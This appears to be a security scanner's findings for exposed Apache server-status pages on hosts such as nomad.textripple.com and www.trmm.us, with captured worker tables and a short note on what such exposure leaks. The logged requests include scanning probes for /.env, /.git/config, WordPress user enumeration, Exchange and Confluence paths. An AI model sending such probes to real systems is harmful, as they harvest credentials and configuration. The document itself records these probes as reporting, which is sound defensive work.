23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58400.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.534280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.504120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84400.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.814140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46410.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85400.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.993210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87400.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43400.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.404110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31400.07.62899.51 96.7.74.198http/1.1 2-0865080/197/38907_ 34.144190.07.15850.79 96.7.74.175http/1.1 2-0865080/190/38922_ 34.20410.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.814140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.934180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.644170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/187/38768_ 34.164140.07.15858.15 96.7.74.198http/1.1 2-0865080/196/38939_ 34.104150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20410.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.084269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b959487865a8009
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:19 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 58 seconds Server load: 0.24 0.40 0.52 Total accesses: 20259891 - Total Traffic: 725.4 GB CPU Usage: u3380.81 s368.67 cu0 cs0 - .0604% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 32 requests currently being processed, 166 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no9yes612012 194454no4yes414002 251755no5yes315002 3112428no3yes315020 461164no4yes513003 546522no2yes216000 6125153no6yes216021 7110199no1yes117000 899710no0yes315000 9100664no9yes117021 1085785no2yes216000 Sum11045 321660711 R___R__RR__R___R______R_R_R_______R_______RR_R___________R__R___ _W___________WW_R__R___W_____R________R_______R__________R____R_ _________________________R___R___R____________R_____R___________ _R____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002R 34.08000.09.003072.14 2.18.255.73http/1.1 0-0404470/388/94023_ 34.75000.08.103027.16 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0404470/383/93839_ 34.77000.04.113042.70 188.166.147.46http/1.1client.simplismarter.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0404470/377/93646_ 34.78000.09.853106.89 2.18.255.105http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/393/93882R 34.42010.05.439251.75 2.18.255.105http/1.1 0-0404470/380/93696_ 34.74010.07.333136.40 2.18.255.105http/1.1trmm.us:80GET / HTTP/1.1 0-0404470/366/93812_ 34.19000.03.263033.51 2.18.255.105http/1.1 0-0404470/380/93921R 34.1701200.02.573105.31 2.18.255.105http/1.1 0-0404470/381/93924R 34.1701120.05.553111.34 2.18.255.105http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.105http/1.1 0-0404470/391/93851_ 34.06000.014.032995.42 2.18.255.73http/1.1 0-0404470/370/93883R 34.29010.010.282985.04 2.18.255.73http/1.1 0-0404470/386/93863_ 34.37000.05.053027.46 2.18.255.105http/1.1 0-0404470/396/93661_ 34.33020.05.003032.88 2.18.255.105http/1.1 0-0404470/388/93927_ 34.050210.011.862988.44 2.18.255.105http/1.1 0-0404470/384/93625R 33.93000.04.873182.69 2.18.255.73http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 2.18.255.105http/1.1 0-0404470/380/93871_ 34.61000.09.423060.00 2.18.255.105http/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.73http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864R 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.73http/1.1 1-0944540/430/98937R 86.74010.05.733143.20 2.18.255.105http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145R 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/417/98922_ 86.750740.05.693206.38 2.18.255.73http/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.73http/1.1 1-0944540/434/98932R 86.761150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871_ 131.041170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.850180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.571170.028.383393.79 2.18.255.56http/1.1 2-0517550/825/102950_ 131.06110.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02100.023.903349.39 2.18.255.105http/1.1 2-0517550/819/103075_ 131.041840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793R 131.28100.035.343287.32 188.166.147.46http/1.1client.simplismarter.com:443GET /includes/.DS_Store HTTP/1.1 2-0517550/858/103204R 130.961730.024.213330.72 2.18.255.105http/1.1 2-0517550/833/102666_ 131.14000.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060R 130.961690.025.363188.87 2.18.255.105http/1.1 2-0517550/830/102752_ 131.43000.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15090.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10000.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.090110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0702630.016.443323.71 2.18.255.73http/1.1 2-0517550/835/102501_ 131.070750.019.023187.48 2.18.255.73http/1.1 2-0517550/842/102544_ 131.140
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b95948755dcba7c
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:20 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 59 seconds Server load: 0.24 0.40 0.52 Total accesses: 20260032 - Total Traffic: 725.4 GB CPU Usage: u3215.91 s349.99 cu0 cs0 - .0574% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 12 requests currently being processed, 186 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no23yes3150200 194454no6yes216011 251755no1yes117010 3112428no21yes3150160 461164no11yes0180101 546522no3yes018030 6125153no5yes018050 7110199no1yes216000 899710no17yes1170170 9100664no7yes018060 1085785no6yes018060 Sum110101 121860852 _W__WR________________R___________R_R_________________WW________ _______R______________________________________________________R_ _______R_______________W________________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/373/94004_ 34.92000.09.003072.15 2.18.255.105http/1.1trmm.us:80GET /.env HTTP/1.1 0-0404470/391/94026_ 34.92000.08.103027.17 2.18.255.73http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0404470/385/93841_ 34.80000.04.113042.70 2.18.255.105http/1.1 0-0404470/379/93648_ 34.85000.09.863106.89 2.18.255.73http/1.1crm.sprout.online:80GET /about HTTP/1.1 0-0404470/397/93886_ 34.92000.05.449251.75 2.18.255.73http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/383/93699R 34.83000.07.333136.41 2.18.255.73http/1.1crm.sprout.online:80GET /debug/default/view?panel=config HTTP/1.1 0-0404470/369/93815_ 34.86000.03.273033.51 2.18.255.105http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 0-0404470/383/93924_ 34.92000.02.573105.31 2.18.255.73http/1.1trmm.us:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 0-0404470/382/93925_ 34.79000.05.553111.34 2.18.255.73http/1.1 0-0404470/390/93743_ 34.92000.017.613204.24 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0404470/396/93856_ 34.92010.014.042995.43 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 0-0404470/372/93885_ 34.83000.010.282985.04 2.18.255.73http/1.1 0-0404470/389/93866_ 34.90010.05.063027.46 2.18.255.73http/1.1trmm.us:80GET / HTTP/1.1 0-0404470/399/93664_ 34.82000.05.003032.88 2.18.255.105http/1.1 0-0404470/392/93931_ 34.83000.011.862988.44 2.18.255.105http/1.1 0-0404470/385/93626_ 34.83000.04.873182.69 2.18.255.73http/1.1 0-0404470/391/93796_ 34.890260.06.823015.34 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0404470/382/93873_ 34.92000.09.423060.01 2.18.255.73http/1.1trmm.us:80GET /telescope/requests HTTP/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.105http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864R 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.140http/1.1 1-0944540/430/98937_ 86.74010.05.733143.20 2.18.255.73http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145_ 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/418/98923_ 87.36090.05.713206.39 2.18.255.73http/1.1crm.textripple.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.105http/1.1 1-0944540/434/98932R 86.762150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871R 131.042170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.851180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.570170.028.383393.79 2.18.255.105http/1.1 2-0517550/825/102950_ 131.06210.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02000.023.903349.39 2.18.255.73http/1.1 2-0517550/819/103075_ 131.040840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793_ 131.28000.035.343287.32 2.18.255.105http/1.1 2-0517550/858/103204_ 130.960730.024.213330.72 2.18.255.73http/1.1 2-0517550/833/102666_ 131.14100.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060_ 130.960690.025.363188.87 2.18.255.73http/1.1 2-0517550/830/102752_ 131.43000.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15190.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10100.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.091110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0712630.016.443323.71 2.18.255.73http/1.1 2-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b959487bdf1729f
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:48 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 42 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911905 - Total Traffic: 388.3 GB CPU Usage: u2713.7 s281.26 cu0 cs0 - .0804% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 23 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no26yes1170150 1111644no13yes216084 222903no2yes018020 3107167no4yes117040 4112229no2yes117020 5121144no3yes117030 667151no11yes216065 918565no1yes018010 1136524no8yes414070 1436768no0yes018000 1542031no5yes117030 Sum11075 231750519 RR__R_WR___RRRWRR___R____R_____________________________________R _______________R______________________R________R____R_________.. ..................................__________________............ ......__R____RR__R______....................................____ _______________________________R................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447R 0.36000.00.001872.59 95.101.88.100http/1.1 0-0192160/1/54507R 0.17200.00.001628.05 73.18.195.9http/1.1 0-0192160/4/54369_ 0.54010.00.001762.17 95.101.88.100http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0192160/5/54408_ 0.44000.00.031798.24 95.101.88.126http/1.1 0-0192160/3/54477R 0.49010.00.011693.14 164.92.240.121http/1.1client.simplismarter.com:443GET /mms/.DS_Store HTTP/1.1 0-0192160/3/54343_ 0.46000.00.001621.91 95.101.88.126http/1.1 0-0192160/5/54725W 0.48000.00.011745.05 95.101.88.100http/1.1localhost:80GET /server-status HTTP/1.1 0-0192160/4/54375R 0.51000.00.001721.30 95.101.88.100http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/3/54494_ 0.40000.00.011605.35 95.101.88.45http/1.1 0-0192160/3/54386_ 0.520510.00.001718.61 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/2/54486_ 0.48000.00.001766.88 95.101.88.100http/1.1 0-0192160/6/54381R 0.51000.00.011645.23 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/1/54319R 0.37000.00.001768.49 164.92.240.121http/1.1client.simplismarter.com:443 0-0192160/1/54534R 0.37000.00.001721.76 95.101.88.100http/1.1 0-0192160/1/54342W 0.37000.00.001737.58 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/1/54403R 0.43000.00.001704.83 95.101.88.126http/1.1 0-0192160/4/54450R 0.510620.00.041695.85 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/3/54334_ 0.44000.00.001783.77 95.101.88.100http/1.1 1-01116440/252/55617_ 22.93000.013.161759.70 95.101.88.100http/1.1 1-01116440/252/55320_ 23.10000.012.701702.85 95.101.88.126http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/250/55455R 22.99010.07.411705.27 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 95.101.88.100http/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 95.101.88.100http/1.1 1-01116440/256/55495_ 23.010600.01.571725.63 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 1-01116440/240/55541_ 23.04000.010.151685.08 95.101.88.126http/1.1localhost:80GET / HTTP/1.1 1-01116440/232/55681R 22.99000.09.711649.16 95.101.88.126http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/247/55840_ 23.0801370.02.801730.25 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 1-01116440/240/55605_ 22.95000.04.121667.85 95.101.88.100http/1.1 1-01116440/244/55678_ 22.90000.06.967903.59 95.101.88.100http/1.1 1-01116440/253/55419_ 23.01000.04.231690.69 95.101.88.100http/1.1trmm.us:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/243/55453_ 22.96000.09.401606.63 95.101.88.126http/1.1 1-01116440/238/55365_ 22.96000.09.541786.53 95.101.88.100http/1.1 1-01116440/235/55277_ 23.020490.04.191645.66 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 1-01116440/247/55604_ 22.91000.013.021701.07 95.101.88.126http/1.1 1-01116440/245/55294_ 22.96000.01.661699.34 95.101.88.100http/1.1 1-01116440/237/55351_ 23.02000.08.211679.77 95.101.88.126http/1.1localhost:80GET /config.json HTTP/1.1 2-0229030/822/59596_ 109.93210.036.611946.19 95.101.88.100http/1.1 2-0229030/860/59772_ 110.15000.045.221932.58 95.101.88.126http/1.1localhost:80GET /login.action HTTP/1.1 2-0229030/823/59554_ 110.08200.051.801915.17 95.101.88.100http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 2-0229030/859/60104_ 110.14000.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93200.044.241872.87 95.101.88.126http/1.1 2-0229030/820/59820_ 110.16000.045.341928.60 95.101.88.100http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 2-0229030/839/59997_ 109.810170.045.231876.02 95.101.88.45http/1.1 2-0229030/842/59781_ 109.96010.048.081881.13 95.101.88.100http/1.1 2-0229030/812/59781_ 110.16000.062.191860.43 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 2-0229030/837/59810_ 110.01000.049.021853.86 95.101.88.126http/1.1 2-0229030/838/59649_ 109.91000.054.491908.23 95.101.88.100http/1.1 2-0229030/863/59893_ 110.16010.030.271826.50 95.101.88.126http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/811/59582_ 109.820190.039.921824.04 95.101.88.126http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b9594876f428a14
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:48 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 42 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911910 - Total Traffic: 388.3 GB CPU Usage: u2713.74 s281.28 cu0 cs0 - .0804% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 25 requests currently being processed, 173 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no26yes1350150 1111644no13yes216084 222903no2yes018010 3107167no4yes117040 4112229no2yes117020 5121144no3yes117030 667151no11yes216065 918565no1yes018010 1136524no11yes414060 1436768no0yes018000 1542031no5yes117030 Sum11078 251730499 RR_WR_WR__RRRRWRR___R____R_____________________________________R _______________R______________________R________R____R_________.. ..................................__________________............ ......__R____RR__R______....................................____ _______________________________R................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447R 0.36000.00.001872.59 95.101.88.100http/1.1 0-0192160/1/54507R 0.17200.00.001628.05 73.18.195.9http/1.1 0-0192160/4/54369_ 0.54010.00.001762.17 95.101.88.100http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0192160/5/54408W 0.44000.00.031798.24 95.101.88.126http/1.1localhost:80GET /server-status HTTP/1.1 0-0192160/3/54477R 0.49010.00.011693.14 164.92.240.121http/1.1client.simplismarter.com:443GET /mms/.DS_Store HTTP/1.1 0-0192160/3/54343_ 0.46000.00.001621.91 95.101.88.126http/1.1 0-0192160/5/54725W 0.48000.00.011745.05 95.101.88.100http/1.1localhost:80GET /server-status HTTP/1.1 0-0192160/4/54375R 0.51000.00.001721.30 95.101.88.100http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/3/54494_ 0.40000.00.011605.35 95.101.88.45http/1.1 0-0192160/3/54386_ 0.520510.00.001718.61 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/2/54486R 0.48000.00.001766.88 95.101.88.100http/1.1 0-0192160/6/54381R 0.51000.00.011645.23 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/1/54319R 0.37000.00.001768.49 164.92.240.121http/1.1client.simplismarter.com:443 0-0192160/1/54534R 0.37000.00.001721.76 95.101.88.100http/1.1 0-0192160/1/54342W 0.37000.00.001737.58 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/1/54403R 0.43000.00.001704.83 95.101.88.126http/1.1 0-0192160/4/54450R 0.510620.00.041695.85 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/3/54334_ 0.44000.00.001783.77 95.101.88.100http/1.1 1-01116440/252/55617_ 22.93000.013.161759.70 95.101.88.100http/1.1 1-01116440/252/55320_ 23.10000.012.701702.85 95.101.88.126http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/250/55455R 22.99010.07.411705.27 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 95.101.88.100http/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 95.101.88.100http/1.1 1-01116440/257/55496_ 23.10000.01.571725.63 95.101.88.100http/1.1localhost:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/240/55541_ 23.04000.010.151685.08 95.101.88.126http/1.1localhost:80GET / HTTP/1.1 1-01116440/232/55681R 22.99000.09.711649.16 95.101.88.126http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/247/55840_ 23.0801370.02.801730.25 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 1-01116440/240/55605_ 22.95000.04.121667.85 95.101.88.100http/1.1 1-01116440/244/55678_ 22.90000.06.967903.59 95.101.88.100http/1.1 1-01116440/253/55419_ 23.01000.04.231690.69 95.101.88.100http/1.1trmm.us:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/243/55453_ 22.96000.09.401606.63 95.101.88.126http/1.1 1-01116440/238/55365_ 22.96000.09.541786.53 95.101.88.100http/1.1 1-01116440/235/55277_ 23.020490.04.191645.66 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 1-01116440/247/55604_ 22.91000.013.021701.07 95.101.88.126http/1.1 1-01116440/245/55294_ 22.96000.01.661699.34 95.101.88.100http/1.1 1-01116440/237/55351_ 23.02000.08.211679.77 95.101.88.126http/1.1localhost:80GET /config.json HTTP/1.1 2-0229030/822/59596_ 109.93210.036.611946.19 95.101.88.100http/1.1 2-0229030/860/59772_ 110.15000.045.221932.58 95.101.88.126http/1.1localhost:80GET /login.action HTTP/1.1 2-0229030/824/59555_ 110.19000.051.801915.17 95.101.88.126http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-0229030/859/60104_ 110.14000.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93200.044.241872.87 95.101.88.126http/1.1 2-0229030/820/59820_ 110.16000.045.341928.60 95.101.88.100http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 2-0229030/839/59997_ 109.810170.045.231876.02 95.101.88.45http/1.1 2-0229030/842/59781_ 109.96010.048.081881.13 95.101.88.100http/1.1 2-0229030/812/59781_ 110.16000.062.191860.43 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 2-0229030/837/59810_ 110.01000.049.021853.86 95.101.88.126http/1.1 2-0229030/838/59649_ 109.91000.054.491908.23 95.101.88.100http/1.1 2-0229030/863/59893_ 110.16010.030.271826.50 95.101.88.126http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/811/59582_ 109.82
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597456b96ff
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 24-Dec-2023 06:19:29 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 12 hours 31 minutes 8 seconds Server load: 1.03 0.83 0.42 Total accesses: 268204 - Total Traffic: 15.3 GB CPU Usage: u588.2 s104.56 cu0 cs0 - .0696% CPU load .269 requests/sec - 16.1 kB/second - 59.7 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no1yes117010 2127655no1yes018010 39765no0yes018000 4106151no0yes018000 5123272no0yes018000 619783no1yes018010 79491no0yes018000 85337no0yes018000 949846no0yes018000 Sum1003 1179030 ____________________W___________________________________________ ________________________________________________________________ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/428/955_ 140.4737300.07.2832.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2653425904389 HT 0-0100440/414/944_ 140.5219300.03.804.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2653606048144 HT 